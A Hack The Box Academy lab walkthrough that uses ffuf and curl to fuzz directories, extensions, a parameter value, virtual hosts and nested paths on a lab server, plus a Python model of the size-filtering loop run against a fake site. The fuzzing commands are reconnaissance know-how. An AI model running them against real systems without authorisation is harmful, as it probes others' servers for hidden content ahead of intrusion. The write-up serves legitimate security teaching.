Platform: Hack The Box Academy
Module: Web Fuzzing
Difficulty: Medium
Tools: ffuf, curl
Wordlist: SecLists — common.txt

🗺️ Attack Path Overview

#   Technique                 Discovery
1   Directory Fuzzing         /admin
2   Extension Fuzzing         /admin/panel.php
3   Parameter Discovery       accessID (leaked in error)
4   Value Fuzzing             accessID=getaccess
5   VHost Fuzzing             hidden.fuzzing_fun.htb
6   Deep Directory Fuzzing    /godeep/stoneedge/bbclone/typo3/...
7   Flag                      HTB{...} 🎉

🔍 Step-by-Step Walkthrough

STEP 01 — Root Directory Fuzzing

We start by fuzzing the root of the target to discover hidden directories.

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u http://154.57.164.77:30770/FUZZ \
     -mc 200,301,302

Result:

admin   [Status: 301, Size: 323]

A 301 redirect means the directory exists. Let's go deeper.

STEP 02 — Extension Fuzzing inside /admin

Accessing /admin/ returns "Access Denied" with a body size of 13 bytes. We fuzz inside it with multiple extensions and filter out the false positives using -fs 13.

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u http://154.57.164.77:30770/admin/FUZZ \
     -e .php,.html,.txt,.bak \
     -mc 200,301,302 \
     -fs 13

Result:

panel.php   [Status: 200, Size: 58]

STEP 03 — Inspect panel.php

curl http://154.57.164.77:30770/admin/panel.php

Result:

Invalid parameter, please ensure accessID is set correctly

💡 The error message leaks the parameter name: accessID — this is a classic Information Disclosure vulnerability.

STEP 04 — Fuzz the Parameter Value

Now we fuzz the value of accessID using the same wordlist, filtering the default 58-byte response.

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://154.57.164.77:30770/admin/panel.php?accessID=FUZZ" \
     -mc 200,301,302 \
     -fs 58

Result:

getaccess   [Status: 200, Size: 68]

STEP 05 — Access the Panel

curl "http://154.57.164.77:30770/admin/panel.php?accessID=getaccess"

Result:

Head on over to the fuzzing_fun.htb vhost for some more fuzzing fun!

We have a new clue — a virtual host to discover.

STEP 06 — Add VHost & Get Next Hint

echo "154.57.164.77 fuzzing_fun.htb" | sudo tee -a /etc/hosts
curl http://fuzzing_fun.htb:30770/

Result:

Welcome to fuzzing_fun.htb!
Your next starting point is in the godeep folder - but it might be on this vhost, it might not, who knows...

The hint says /godeep might be on another vhost — time for VHost fuzzing.

STEP 07 — Virtual Host Fuzzing

First, we identify the default response size for unknown vhosts:

curl -s -H "Host: test.htb" http://154.57.164.77:30770/ | wc -c
# → 273 bytes

Now fuzz for subdomains of fuzzing_fun.htb, filtering the default 273-byte response:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://154.57.164.77:30770/" \
     -H "Host: FUZZ.fuzzing_fun.htb" \
     -mc 200,301,302 \
     -fs 273

Result:

hidden   [Status: 200, Size: 45]

STEP 08 — Add Hidden VHost & Enter /godeep

echo "154.57.164.77 hidden.fuzzing_fun.htb" | sudo tee -a /etc/hosts
curl http://hidden.fuzzing_fun.htb:30770/godeep/
# → "Keep going..."

Time to fuzz deeper! We filter size 12 (the "Keep going" response):

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/FUZZ" \
     -mc 200,301,302 \
     -e .php,.html,.txt \
     -fs 12

Result:

stoneedge   [Status: 301]

STEP 09 — Deep Directory Fuzzing (Keep Going!)

We keep fuzzing layer by layer, each time filtering the previous response size:

Layer 2 — /godeep/stoneedge/

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/stoneedge/FUZZ" \
     -mc 200,301,302 -e .php,.html,.txt -fs 13
bbclone   [Status: 301]   # "Almost there..."

Layer 3 — /godeep/stoneedge/bbclone/

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/stoneedge/bbclone/FUZZ" \
     -mc 200,301,302 -e .php,.html,.txt -fs 17
typo3   [Status: 301]   # "Just a bit more..."

Layer 4 — /godeep/stoneedge/bbclone/typo3/

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/stoneedge/bbclone/typo3/FUZZ" \
     -mc 200,301,302 -e .php,.html,.txt -fs [response_size]

Keep fuzzing each new directory until you reach the final page with the flag!
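The calibrate-then-filter loop of STEP 07 to 09 (measure the size of a response for a name that cannot exist, then keep only hits whose status or size differs, and repeat per layer) modelled as an added Python example; it is not part of the original walkthrough and not ffuf's code. FAKE_SITE, fake_fetch and the flag string are constructed so the example runs offline, and the fetch callable is injected so the same logic could be handed a real HTTP client.

```python
import secrets

# Constructed stand-in for the target (not the real HTB box): path -> (status, body).
# Unknown names under a directory return that directory's placeholder text, the
# behaviour that forces the -fs filter in STEP 08/09.
FAKE_SITE = {
    "/": (200, "Welcome to the constructed vhost!"),
    "/godeep/": (200, "Keep going..."),
    "/godeep/stoneedge/": (200, "Almost there..."),
    "/godeep/stoneedge/bbclone/": (200, "Just a bit more..."),
    "/godeep/stoneedge/bbclone/flag.txt": (200, "HTB{constructed_sample_flag}"),
}

def fake_fetch(path):
    """Known directory without trailing slash -> 301; exact match -> its entry;
    anything else -> 200 with the nearest parent directory's placeholder."""
    if path in FAKE_SITE:
        return FAKE_SITE[path]
    if path + "/" in FAKE_SITE:
        return 301, "Moved Permanently"
    parent = path.rsplit("/", 1)[0] + "/"
    while parent not in FAKE_SITE:
        parent = parent.rstrip("/").rsplit("/", 1)[0] + "/"
    return 200, FAKE_SITE[parent][1]

def fuzz_layer(fetch, directory, words):
    """Calibrate on a random name that cannot be in the wordlist (the curl | wc -c
    step), then keep responses whose (status, size) differs from that baseline."""
    status, body = fetch(directory + secrets.token_hex(8))
    baseline = (status, len(body))
    hits = []
    for word in words:
        status, body = fetch(directory + word)
        if status in (200, 301, 302) and (status, len(body)) != baseline:
            hits.append((word, status, len(body)))
    return baseline[1], hits

def fuzz_recursive(fetch, directory, words, depth=0, max_depth=8):
    """Descend into every 301 hit, re-calibrating the filter size per layer as
    STEP 09 does by hand. Returns (path, status, size, filtered_size) rows."""
    found = []
    filtered, hits = fuzz_layer(fetch, directory, words)
    for word, status, size in hits:
        path = directory + word
        found.append((path, status, size, filtered))
        if status == 301 and depth < max_depth:
            found.extend(fuzz_recursive(fetch, path + "/", words, depth + 1, max_depth))
    return found
```

Comparing (status, size) rather than size alone is why a 301 still surfaces even if its body happened to match the baseline length; a genuine 200 whose body is exactly the baseline size stays hidden, which is the blind spot of a bare -fs filter.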

🚩 Flag

HTB{...}

(Replace with the actual flag after completing the challenge)

💡 Key Takeaways

Technique             Lesson Learned
Directory Fuzzing     Always fuzz with multiple extensions, not just directory names
False Positives       Use -fs to filter repeated response sizes
Error Messages        Error messages can leak sensitive info like parameter names
VHost Fuzzing         Change the Host header — not the URL — to discover virtual hosts
Deep Enumeration      Keep fuzzing every new directory you find recursively
Wordlist Selection    common.txt is enough for many cases — choose your wordlist wisely

🛠️ Tools & References

Written as part of HTB Academy — Web Fuzzing module walkthrough. Happy Hacking! 🎯

Ahmed Hassan ELfekiry — CyberSecurity Researcher